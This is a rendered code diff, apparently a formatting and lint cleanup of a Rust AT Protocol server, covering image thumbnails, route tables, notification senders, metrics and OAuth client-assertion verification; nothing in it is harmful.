) -> Result<ImageProcessingResult, ImageError> {
94
98
if data.len() > self.max_file_size {
95
99
return Err(ImageError::FileTooLarge {
96
100
size: data.len(),
···
107
111
});
108
112
}
109
113
let original = self.encode_image(&img)?;
110
-
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
114
+
let thumbnail_feed = if self.generate_thumbnails
115
+
&& (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED)
116
+
{
111
117
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
112
118
} else {
113
119
None
114
120
};
115
-
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
121
+
let thumbnail_full = if self.generate_thumbnails
122
+
&& (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL)
123
+
{
116
124
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
117
125
} else {
118
126
None
···
183
191
})
184
192
}
185
193
186
-
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
194
+
fn generate_thumbnail(
195
+
&self,
196
+
img: &DynamicImage,
197
+
max_size: u32,
198
+
) -> Result<ProcessedImage, ImageError> {
187
199
let (orig_width, orig_height) = (img.width(), img.height());
188
200
let (new_width, new_height) = if orig_width > orig_height {
189
201
let ratio = max_size as f64 / orig_width as f64;
···
204
216
}
205
217
206
218
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
207
-
let format = image::guess_format(data)
208
-
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
219
+
let format =
220
+
image::guess_format(data).map_err(|e| ImageError::DecodeError(e.to_string()))?;
209
221
let cursor = Cursor::new(data);
210
222
let img = ImageReader::with_format(cursor, format)
211
223
.decode()
···
224
236
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
225
237
let img = DynamicImage::new_rgb8(width, height);
226
238
let mut buf = Vec::new();
227
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
239
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
240
+
.unwrap();
228
241
buf
229
242
}
230
243
+39
-43
src/lib.rs
+39
-43
src/lib.rs
···
109
109
"/xrpc/com.atproto.sync.getLatestCommit",
110
110
get(sync::get_latest_commit),
111
111
)
112
-
.route(
113
-
"/xrpc/com.atproto.sync.listRepos",
114
-
get(sync::list_repos),
115
-
)
116
-
.route(
117
-
"/xrpc/com.atproto.sync.getBlob",
118
-
get(sync::get_blob),
119
-
)
120
-
.route(
121
-
"/xrpc/com.atproto.sync.listBlobs",
122
-
get(sync::list_blobs),
123
-
)
112
+
.route("/xrpc/com.atproto.sync.listRepos", get(sync::list_repos))
113
+
.route("/xrpc/com.atproto.sync.getBlob", get(sync::get_blob))
114
+
.route("/xrpc/com.atproto.sync.listBlobs", get(sync::list_blobs))
124
115
.route(
125
116
"/xrpc/com.atproto.sync.getRepoStatus",
126
117
get(sync::get_repo_status),
···
145
136
"/xrpc/com.atproto.sync.requestCrawl",
146
137
post(sync::request_crawl),
147
138
)
148
-
.route(
149
-
"/xrpc/com.atproto.sync.getBlocks",
150
-
get(sync::get_blocks),
151
-
)
152
-
.route(
153
-
"/xrpc/com.atproto.sync.getRepo",
154
-
get(sync::get_repo),
155
-
)
156
-
.route(
157
-
"/xrpc/com.atproto.sync.getRecord",
158
-
get(sync::get_record),
159
-
)
139
+
.route("/xrpc/com.atproto.sync.getBlocks", get(sync::get_blocks))
140
+
.route("/xrpc/com.atproto.sync.getRepo", get(sync::get_repo))
141
+
.route("/xrpc/com.atproto.sync.getRecord", get(sync::get_record))
160
142
.route(
161
143
"/xrpc/com.atproto.sync.subscribeRepos",
162
144
get(sync::subscribe_repos),
163
145
)
164
-
.route(
165
-
"/xrpc/com.atproto.sync.getHead",
166
-
get(sync::get_head),
167
-
)
146
+
.route("/xrpc/com.atproto.sync.getHead", get(sync::get_head))
168
147
.route(
169
148
"/xrpc/com.atproto.sync.getCheckout",
170
149
get(sync::get_checkout),
···
349
328
"/xrpc/app.bsky.feed.getPostThread",
350
329
get(api::feed::get_post_thread),
351
330
)
352
-
.route(
353
-
"/xrpc/app.bsky.feed.getFeed",
354
-
get(api::feed::get_feed),
355
-
)
331
+
.route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed))
356
332
.route(
357
333
"/xrpc/app.bsky.notification.registerPush",
358
334
post(api::notification::register_push),
359
335
)
360
336
.route("/.well-known/did.json", get(api::identity::well_known_did))
361
-
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
337
+
.route(
338
+
"/.well-known/atproto-did",
339
+
get(api::identity::well_known_atproto_did),
340
+
)
362
341
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
363
342
.route(
364
343
"/.well-known/oauth-protected-resource",
···
375
354
)
376
355
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
377
356
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
378
-
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
379
-
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
380
-
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
381
-
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
357
+
.route(
358
+
"/oauth/authorize/select",
359
+
post(oauth::endpoints::authorize_select),
360
+
)
361
+
.route(
362
+
"/oauth/authorize/2fa",
363
+
get(oauth::endpoints::authorize_2fa_get),
364
+
)
365
+
.route(
366
+
"/oauth/authorize/2fa",
367
+
post(oauth::endpoints::authorize_2fa_post),
368
+
)
369
+
.route(
370
+
"/oauth/authorize/deny",
371
+
post(oauth::endpoints::authorize_deny),
372
+
)
382
373
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
383
374
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
384
-
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
375
+
.route(
376
+
"/oauth/introspect",
377
+
post(oauth::endpoints::introspect_token),
378
+
)
385
379
.route(
386
380
"/xrpc/com.atproto.temp.checkSignupQueue",
387
381
get(api::temp::check_signup_queue),
···
404
398
)
405
399
.with_state(state);
406
400
407
-
let frontend_dir = std::env::var("FRONTEND_DIR")
408
-
.unwrap_or_else(|_| "./frontend/dist".to_string());
401
+
let frontend_dir =
402
+
std::env::var("FRONTEND_DIR").unwrap_or_else(|_| "./frontend/dist".to_string());
409
403
410
-
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
404
+
if std::path::Path::new(&frontend_dir)
405
+
.join("index.html")
406
+
.exists()
407
+
{
411
408
let index_path = format!("{}/index.html", frontend_dir);
412
-
let serve_dir = ServeDir::new(&frontend_dir)
413
-
.not_found_service(ServeFile::new(index_path));
409
+
let serve_dir = ServeDir::new(&frontend_dir).not_found_service(ServeFile::new(index_path));
414
410
router.fallback_service(serve_dir)
415
411
} else {
416
412
router
+9
-3
src/main.rs
+9
-3
src/main.rs
···
1
1
use bspds::crawlers::{Crawlers, start_crawlers_service};
2
-
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
2
+
use bspds::notifications::{
3
+
DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender,
4
+
};
3
5
use bspds::state::AppState;
4
6
use std::net::SocketAddr;
5
7
use std::process::ExitCode;
···
94
96
95
97
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
96
98
let crawlers = Arc::new(
97
-
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
99
+
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone()),
98
100
);
99
101
let firehose_rx = state.firehose_tx.subscribe();
100
102
info!("Crawlers notification service enabled");
101
-
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
103
+
Some(tokio::spawn(start_crawlers_service(
104
+
crawlers,
105
+
firehose_rx,
106
+
shutdown_rx,
107
+
)))
102
108
} else {
103
109
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
104
110
None
+9
-12
src/metrics.rs
+9
-12
src/metrics.rs
···
24
24
}
25
25
26
26
fn describe_metrics() {
27
-
metrics::describe_counter!(
28
-
"bspds_http_requests_total",
29
-
"Total number of HTTP requests"
30
-
);
27
+
metrics::describe_counter!("bspds_http_requests_total", "Total number of HTTP requests");
31
28
metrics::describe_histogram!(
32
29
"bspds_http_request_duration_seconds",
33
30
"HTTP request duration in seconds"
···
64
61
"bspds_rate_limit_rejections_total",
65
62
"Total number of rate limit rejections"
66
63
);
67
-
metrics::describe_counter!(
68
-
"bspds_db_queries_total",
69
-
"Total number of database queries"
70
-
);
64
+
metrics::describe_counter!("bspds_db_queries_total", "Total number of database queries");
71
65
metrics::describe_histogram!(
72
66
"bspds_db_query_duration_seconds",
73
67
"Database query duration in seconds"
···
78
72
match PROMETHEUS_HANDLE.get() {
79
73
Some(handle) => {
80
74
let metrics = handle.render();
81
-
(StatusCode::OK, [("content-type", "text/plain; version=0.0.4")], metrics)
75
+
(
76
+
StatusCode::OK,
77
+
[("content-type", "text/plain; version=0.0.4")],
78
+
metrics,
79
+
)
82
80
}
83
81
None => (
84
82
StatusCode::INTERNAL_SERVER_ERROR,
···
117
115
}
118
116
119
117
fn normalize_path(path: &str) -> String {
120
-
if path.starts_with("/xrpc/") {
121
-
if let Some(method) = path.strip_prefix("/xrpc/") {
118
+
if path.starts_with("/xrpc/")
119
+
&& let Some(method) = path.strip_prefix("/xrpc/") {
122
120
if let Some(q) = method.find('?') {
123
121
return format!("/xrpc/{}", &method[..q]);
124
122
}
125
123
return path.to_string();
126
124
}
127
-
}
128
125
129
126
if path.starts_with("/u/") && path.ends_with("/did.json") {
130
127
return "/u/{handle}/did.json".to_string();
+3
-3
src/notifications/mod.rs
+3
-3
src/notifications/mod.rs
···
8
8
};
9
9
10
10
pub use service::{
11
-
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
12
-
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
13
-
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
11
+
NotificationService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion,
12
+
enqueue_email_update, enqueue_email_verification, enqueue_notification, enqueue_password_reset,
13
+
enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome,
14
14
};
15
15
16
16
pub use types::{
+14
-19
src/notifications/sender.rs
+14
-19
src/notifications/sender.rs
···
80
80
Self {
81
81
from_address,
82
82
from_name,
83
-
sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
83
+
sendmail_path: std::env::var("SENDMAIL_PATH")
84
+
.unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
84
85
}
85
86
}
86
87
···
91
92
}
92
93
93
94
pub fn format_email(&self, notification: &QueuedNotification) -> String {
94
-
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
95
+
let subject =
96
+
sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
95
97
let recipient = sanitize_header_value(¬ification.recipient);
96
98
let from_header = if self.from_name.is_empty() {
97
99
self.from_address.clone()
98
100
} else {
99
-
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
101
+
format!(
102
+
"{} <{}>",
103
+
sanitize_header_value(&self.from_name),
104
+
self.from_address
105
+
)
100
106
};
101
107
format!(
102
108
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
103
-
from_header,
104
-
recipient,
105
-
subject,
106
-
notification.body
109
+
from_header, recipient, subject, notification.body
107
110
)
108
111
}
109
112
}
···
195
198
Err(e) => {
196
199
if e.is_timeout() {
197
200
if attempt < MAX_RETRIES - 1 {
198
-
last_error = Some(format!("Discord request timed out"));
201
+
last_error = Some("Discord request timed out".to_string());
199
202
retry_delay(attempt).await;
200
203
continue;
201
204
}
···
243
246
let chat_id = ¬ification.recipient;
244
247
let subject = notification.subject.as_deref().unwrap_or("Notification");
245
248
let text = format!("*{}*\n\n{}", subject, notification.body);
246
-
let url = format!(
247
-
"https://api.telegram.org/bot{}/sendMessage",
248
-
self.bot_token
249
-
);
249
+
let url = format!("https://api.telegram.org/bot{}/sendMessage", self.bot_token);
250
250
let payload = json!({
251
251
"chat_id": chat_id,
252
252
"text": text,
···
254
254
});
255
255
let mut last_error = None;
256
256
for attempt in 0..MAX_RETRIES {
257
-
let result = self
258
-
.http_client
259
-
.post(&url)
260
-
.json(&payload)
261
-
.send()
262
-
.await;
257
+
let result = self.http_client.post(&url).json(&payload).send().await;
263
258
match result {
264
259
Ok(response) => {
265
260
if response.status().is_success() {
···
280
275
Err(e) => {
281
276
if e.is_timeout() {
282
277
if attempt < MAX_RETRIES - 1 {
283
-
last_error = Some(format!("Telegram request timed out"));
278
+
last_error = Some("Telegram request timed out".to_string());
284
279
retry_delay(attempt).await;
285
280
continue;
286
281
}
+7
-2
src/notifications/service.rs
+7
-2
src/notifications/service.rs
···
80
80
81
81
pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
82
82
if self.senders.is_empty() {
83
-
warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
83
+
warn!(
84
+
"Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured."
85
+
);
84
86
}
85
87
info!(
86
88
poll_interval_secs = self.poll_interval.as_secs(),
···
231
233
}
232
234
}
233
235
234
-
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
236
+
pub async fn enqueue_notification(
237
+
db: &PgPool,
238
+
notification: NewNotification,
239
+
) -> Result<Uuid, sqlx::Error> {
235
240
sqlx::query_scalar!(
236
241
r#"
237
242
INSERT INTO notification_queue
+117
-80
src/oauth/client.rs
+117
-80
src/oauth/client.rs
···
88
88
89
89
fn is_loopback_client(client_id: &str) -> bool {
90
90
if let Ok(url) = reqwest::Url::parse(client_id) {
91
-
url.scheme() == "http"
92
-
&& url.host_str() == Some("localhost")
93
-
&& url.port().is_none()
91
+
url.scheme() == "http" && url.host_str() == Some("localhost") && url.port().is_none()
94
92
} else {
95
93
false
96
94
}
97
95
}
98
96
99
97
fn build_loopback_metadata(client_id: &str) -> Result<ClientMetadata, OAuthError> {
100
-
let url = reqwest::Url::parse(client_id).map_err(|_| {
101
-
OAuthError::InvalidClient("Invalid loopback client_id URL".to_string())
102
-
})?;
98
+
let url = reqwest::Url::parse(client_id)
99
+
.map_err(|_| OAuthError::InvalidClient("Invalid loopback client_id URL".to_string()))?;
103
100
let mut redirect_uris = Vec::new();
104
101
for (key, value) in url.query_pairs() {
105
102
if key == "redirect_uri" {
···
117
114
client_uri: None,
118
115
logo_uri: None,
119
116
redirect_uris,
120
-
grant_types: vec!["authorization_code".to_string(), "refresh_token".to_string()],
117
+
grant_types: vec![
118
+
"authorization_code".to_string(),
119
+
"refresh_token".to_string(),
120
+
],
121
121
response_types: vec!["code".to_string()],
122
122
scope,
123
123
token_endpoint_auth_method: Some("none".to_string()),
···
134
134
}
135
135
{
136
136
let cache = self.cache.read().await;
137
-
if let Some(cached) = cache.get(client_id) {
138
-
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
137
+
if let Some(cached) = cache.get(client_id)
138
+
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
139
139
return Ok(cached.metadata.clone());
140
140
}
141
-
}
142
141
}
143
142
let metadata = self.fetch_metadata(client_id).await?;
144
143
{
···
154
153
Ok(metadata)
155
154
}
156
155
157
-
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
156
+
pub async fn get_jwks(
157
+
&self,
158
+
metadata: &ClientMetadata,
159
+
) -> Result<serde_json::Value, OAuthError> {
158
160
if let Some(jwks) = &metadata.jwks {
159
161
return Ok(jwks.clone());
160
162
}
···
165
167
})?;
166
168
{
167
169
let cache = self.jwks_cache.read().await;
168
-
if let Some(cached) = cache.get(jwks_uri) {
169
-
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
170
+
if let Some(cached) = cache.get(jwks_uri)
171
+
&& cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
170
172
return Ok(cached.jwks.clone());
171
173
}
172
-
}
173
174
}
174
175
let jwks = self.fetch_jwks(jwks_uri).await?;
175
176
{
···
186
187
}
187
188
188
189
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
189
-
if !jwks_uri.starts_with("https://") {
190
-
if !jwks_uri.starts_with("http://")
191
-
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))
190
+
if !jwks_uri.starts_with("https://")
191
+
&& (!jwks_uri.starts_with("http://")
192
+
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1")))
192
193
{
193
194
return Err(OAuthError::InvalidClient(
194
195
"jwks_uri must use https (except for localhost)".to_string(),
195
196
));
196
197
}
197
-
}
198
198
let response = self
199
199
.http_client
200
200
.get(jwks_uri)
···
242
242
.header("Accept", "application/json")
243
243
.send()
244
244
.await
245
-
.map_err(|e| OAuthError::InvalidClient(format!("Failed to fetch client metadata: {}", e)))?;
245
+
.map_err(|e| {
246
+
OAuthError::InvalidClient(format!("Failed to fetch client metadata: {}", e))
247
+
})?;
246
248
if !response.status().is_success() {
247
249
return Err(OAuthError::InvalidClient(format!(
248
250
"Failed to fetch client metadata: HTTP {}",
249
251
response.status()
250
252
)));
251
253
}
252
-
let mut metadata: ClientMetadata = response
253
-
.json()
254
-
.await
255
-
.map_err(|e| OAuthError::InvalidClient(format!("Invalid client metadata JSON: {}", e)))?;
254
+
let mut metadata: ClientMetadata = response.json().await.map_err(|e| {
255
+
OAuthError::InvalidClient(format!("Invalid client metadata JSON: {}", e))
256
+
})?;
256
257
if metadata.client_id.is_empty() {
257
258
metadata.client_id = client_id.to_string();
258
259
} else if metadata.client_id != client_id {
···
274
275
self.validate_redirect_uri_format(uri)?;
275
276
}
276
277
if !metadata.grant_types.is_empty()
277
-
&& !metadata.grant_types.contains(&"authorization_code".to_string())
278
+
&& !metadata
279
+
.grant_types
280
+
.contains(&"authorization_code".to_string())
278
281
{
279
282
return Err(OAuthError::InvalidClient(
280
283
"authorization_code grant type is required".to_string(),
···
298
301
if metadata.redirect_uris.contains(&redirect_uri.to_string()) {
299
302
return Ok(());
300
303
}
301
-
if Self::is_loopback_client(&metadata.client_id) {
302
-
if let Ok(req_url) = reqwest::Url::parse(redirect_uri) {
304
+
if Self::is_loopback_client(&metadata.client_id)
305
+
&& let Ok(req_url) = reqwest::Url::parse(redirect_uri) {
303
306
let req_host = req_url.host_str().unwrap_or("");
304
307
let is_loopback_redirect = req_url.scheme() == "http"
305
308
&& (req_host == "localhost" || req_host == "127.0.0.1" || req_host == "[::1]");
···
319
322
}
320
323
}
321
324
}
322
-
}
323
325
Err(OAuthError::InvalidRequest(
324
326
"redirect_uri not registered for client".to_string(),
325
327
))
···
331
333
"redirect_uri must not contain a fragment".to_string(),
332
334
));
333
335
}
334
-
let parsed = reqwest::Url::parse(uri).map_err(|_| {
335
-
OAuthError::InvalidClient(format!("Invalid redirect_uri: {}", uri))
336
-
})?;
336
+
let parsed = reqwest::Url::parse(uri)
337
+
.map_err(|_| OAuthError::InvalidClient(format!("Invalid redirect_uri: {}", uri)))?;
337
338
let scheme = parsed.scheme();
338
339
if scheme == "http" {
339
340
let host = parsed.host_str().unwrap_or("");
···
343
344
));
344
345
}
345
346
} else if scheme == "https" {
346
-
} else if scheme.chars().all(|c| c.is_ascii_lowercase() || c.is_ascii_digit() || c == '+' || c == '.' || c == '-') {
347
-
if !scheme.chars().next().map(|c| c.is_ascii_lowercase()).unwrap_or(false) {
347
+
} else if scheme.chars().all(|c| {
348
+
c.is_ascii_lowercase() || c.is_ascii_digit() || c == '+' || c == '.' || c == '-'
349
+
}) {
350
+
if !scheme
351
+
.chars()
352
+
.next()
353
+
.map(|c| c.is_ascii_lowercase())
354
+
.unwrap_or(false)
355
+
{
348
356
return Err(OAuthError::InvalidClient(format!(
349
357
"Invalid redirect_uri scheme: {}",
350
358
scheme
···
366
374
}
367
375
368
376
pub fn auth_method(&self) -> &str {
369
-
self.token_endpoint_auth_method
370
-
.as_deref()
371
-
.unwrap_or("none")
377
+
self.token_endpoint_auth_method.as_deref().unwrap_or("none")
372
378
}
373
379
}
374
380
···
411
417
metadata: &ClientMetadata,
412
418
client_assertion: &str,
413
419
) -> Result<(), OAuthError> {
414
-
use base64::{Engine as _, engine::general_purpose::{URL_SAFE_NO_PAD, STANDARD}};
420
+
use base64::{
421
+
Engine as _,
422
+
engine::general_purpose::{STANDARD, URL_SAFE_NO_PAD},
423
+
};
415
424
let parts: Vec<&str> = client_assertion.split('.').collect();
416
425
if parts.len() != 3 {
417
-
return Err(OAuthError::InvalidClient("Invalid client_assertion format".to_string()));
426
+
return Err(OAuthError::InvalidClient(
427
+
"Invalid client_assertion format".to_string(),
428
+
));
418
429
}
419
430
let header_bytes = URL_SAFE_NO_PAD
420
431
.decode(parts[0])
···
422
433
.map_err(|_| OAuthError::InvalidClient("Invalid assertion header encoding".to_string()))?;
423
434
let header: serde_json::Value = serde_json::from_slice(&header_bytes)
424
435
.map_err(|_| OAuthError::InvalidClient("Invalid assertion header JSON".to_string()))?;
425
-
let alg = header.get("alg").and_then(|a| a.as_str()).ok_or_else(|| {
426
-
OAuthError::InvalidClient("Missing alg in client_assertion".to_string())
427
-
})?;
428
-
if !matches!(alg, "ES256" | "ES384" | "RS256" | "RS384" | "RS512" | "EdDSA") {
436
+
let alg = header
437
+
.get("alg")
438
+
.and_then(|a| a.as_str())
439
+
.ok_or_else(|| OAuthError::InvalidClient("Missing alg in client_assertion".to_string()))?;
440
+
if !matches!(
441
+
alg,
442
+
"ES256" | "ES384" | "RS256" | "RS384" | "RS512" | "EdDSA"
443
+
) {
429
444
return Err(OAuthError::InvalidClient(format!(
430
445
"Unsupported client_assertion algorithm: {}",
431
446
alg
···
441
456
})?;
442
457
let payload: serde_json::Value = serde_json::from_slice(&payload_bytes)
443
458
.map_err(|_| OAuthError::InvalidClient("Invalid assertion payload JSON".to_string()))?;
444
-
let iss = payload.get("iss").and_then(|i| i.as_str()).ok_or_else(|| {
445
-
OAuthError::InvalidClient("Missing iss in client_assertion".to_string())
446
-
})?;
459
+
let iss = payload
460
+
.get("iss")
461
+
.and_then(|i| i.as_str())
462
+
.ok_or_else(|| OAuthError::InvalidClient("Missing iss in client_assertion".to_string()))?;
447
463
if iss != metadata.client_id {
448
464
return Err(OAuthError::InvalidClient(
449
465
"client_assertion iss does not match client_id".to_string(),
450
466
));
451
467
}
452
-
let sub = payload.get("sub").and_then(|s| s.as_str()).ok_or_else(|| {
453
-
OAuthError::InvalidClient("Missing sub in client_assertion".to_string())
454
-
})?;
468
+
let sub = payload
469
+
.get("sub")
470
+
.and_then(|s| s.as_str())
471
+
.ok_or_else(|| OAuthError::InvalidClient("Missing sub in client_assertion".to_string()))?;
455
472
if sub != metadata.client_id {
456
473
return Err(OAuthError::InvalidClient(
457
474
"client_assertion sub does not match client_id".to_string(),
···
462
479
let iat = payload.get("iat").and_then(|i| i.as_i64());
463
480
if let Some(exp) = exp {
464
481
if exp < now {
465
-
return Err(OAuthError::InvalidClient("client_assertion has expired".to_string()));
482
+
return Err(OAuthError::InvalidClient(
483
+
"client_assertion has expired".to_string(),
484
+
));
466
485
}
467
486
} else if let Some(iat) = iat {
468
487
let max_age_secs = 300;
469
488
if now - iat > max_age_secs {
470
-
tracing::warn!(iat = iat, now = now, "client_assertion too old (no exp, using iat)");
471
-
return Err(OAuthError::InvalidClient("client_assertion is too old".to_string()));
489
+
tracing::warn!(
490
+
iat = iat,
491
+
now = now,
492
+
"client_assertion too old (no exp, using iat)"
493
+
);
494
+
return Err(OAuthError::InvalidClient(
495
+
"client_assertion is too old".to_string(),
496
+
));
472
497
}
473
498
} else {
474
499
return Err(OAuthError::InvalidClient(
475
500
"client_assertion must have exp or iat claim".to_string(),
476
501
));
477
502
}
478
-
if let Some(iat) = iat {
479
-
if iat > now + 60 {
503
+
if let Some(iat) = iat
504
+
&& iat > now + 60 {
480
505
return Err(OAuthError::InvalidClient(
481
506
"client_assertion iat is in the future".to_string(),
482
507
));
483
508
}
484
-
}
485
509
let jwks = cache.get_jwks(metadata).await?;
486
-
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
487
-
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
488
-
})?;
510
+
let keys = jwks
511
+
.get("keys")
512
+
.and_then(|k| k.as_array())
513
+
.ok_or_else(|| OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string()))?;
489
514
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
490
515
keys.iter()
491
516
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
···
532
557
signature: &[u8],
533
558
) -> Result<(), OAuthError> {
534
559
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
535
-
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
536
560
use p256::EncodedPoint;
537
-
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
538
-
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
539
-
})?;
540
-
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
541
-
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
542
-
})?;
543
-
let x_bytes = URL_SAFE_NO_PAD.decode(x)
561
+
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
562
+
let x = key
563
+
.get("x")
564
+
.and_then(|v| v.as_str())
565
+
.ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?;
566
+
let y = key
567
+
.get("y")
568
+
.and_then(|v| v.as_str())
569
+
.ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?;
570
+
let x_bytes = URL_SAFE_NO_PAD
571
+
.decode(x)
544
572
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
545
-
let y_bytes = URL_SAFE_NO_PAD.decode(y)
573
+
let y_bytes = URL_SAFE_NO_PAD
574
+
.decode(y)
546
575
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
547
576
let mut point_bytes = vec![0x04];
548
577
point_bytes.extend_from_slice(&x_bytes);
···
564
593
signature: &[u8],
565
594
) -> Result<(), OAuthError> {
566
595
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
596
+
use p384::EncodedPoint;
567
597
use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
568
-
use p384::EncodedPoint;
569
-
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
570
-
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
571
-
})?;
572
-
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
573
-
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
574
-
})?;
575
-
let x_bytes = URL_SAFE_NO_PAD.decode(x)
598
+
let x = key
599
+
.get("x")
600
+
.and_then(|v| v.as_str())
601
+
.ok_or_else(|| OAuthError::InvalidClient("Missing x coordinate in EC key".to_string()))?;
602
+
let y = key
603
+
.get("y")
604
+
.and_then(|v| v.as_str())
605
+
.ok_or_else(|| OAuthError::InvalidClient("Missing y coordinate in EC key".to_string()))?;
606
+
let x_bytes = URL_SAFE_NO_PAD
607
+
.decode(x)
576
608
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
577
-
let y_bytes = URL_SAFE_NO_PAD.decode(y)
609
+
let y_bytes = URL_SAFE_NO_PAD
610
+
.decode(y)
578
611
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
579
612
let mut point_bytes = vec![0x04];
580
613
point_bytes.extend_from_slice(&x_bytes);
···
615
648
crv
616
649
)));
617
650
}
618
-
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
619
-
OAuthError::InvalidClient("Missing x in OKP key".to_string())
620
-
})?;
621
-
let x_bytes = URL_SAFE_NO_PAD.decode(x)
651
+
let x = key
652
+
.get("x")
653
+
.and_then(|v| v.as_str())
654
+
.ok_or_else(|| OAuthError::InvalidClient("Missing x in OKP key".to_string()))?;
655
+
let x_bytes = URL_SAFE_NO_PAD
656
+
.decode(x)
622
657
.map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
623
-
let key_bytes: [u8; 32] = x_bytes.try_into()
658
+
let key_bytes: [u8; 32] = x_bytes
659
+
.try_into()
624
660
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
625
661
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
626
662
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
627
-
let sig_bytes: [u8; 64] = signature.try_into()
663
+
let sig_bytes: [u8; 64] = signature
664
+
.try_into()
628
665
.map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
629
666
let sig = Signature::from_bytes(&sig_bytes);
630
667
verifying_key
+1
-1
src/oauth/db/client.rs
+1
-1
src/oauth/db/client.rs
+2
-5
src/oauth/db/device.rs
+2
-5
src/oauth/db/device.rs
···
1
+
use super::super::{DeviceData, OAuthError};
1
2
use chrono::{DateTime, Utc};
2
3
use sqlx::PgPool;
3
-
use super::super::{DeviceData, OAuthError};
4
4
5
5
pub struct DeviceAccountRow {
6
6
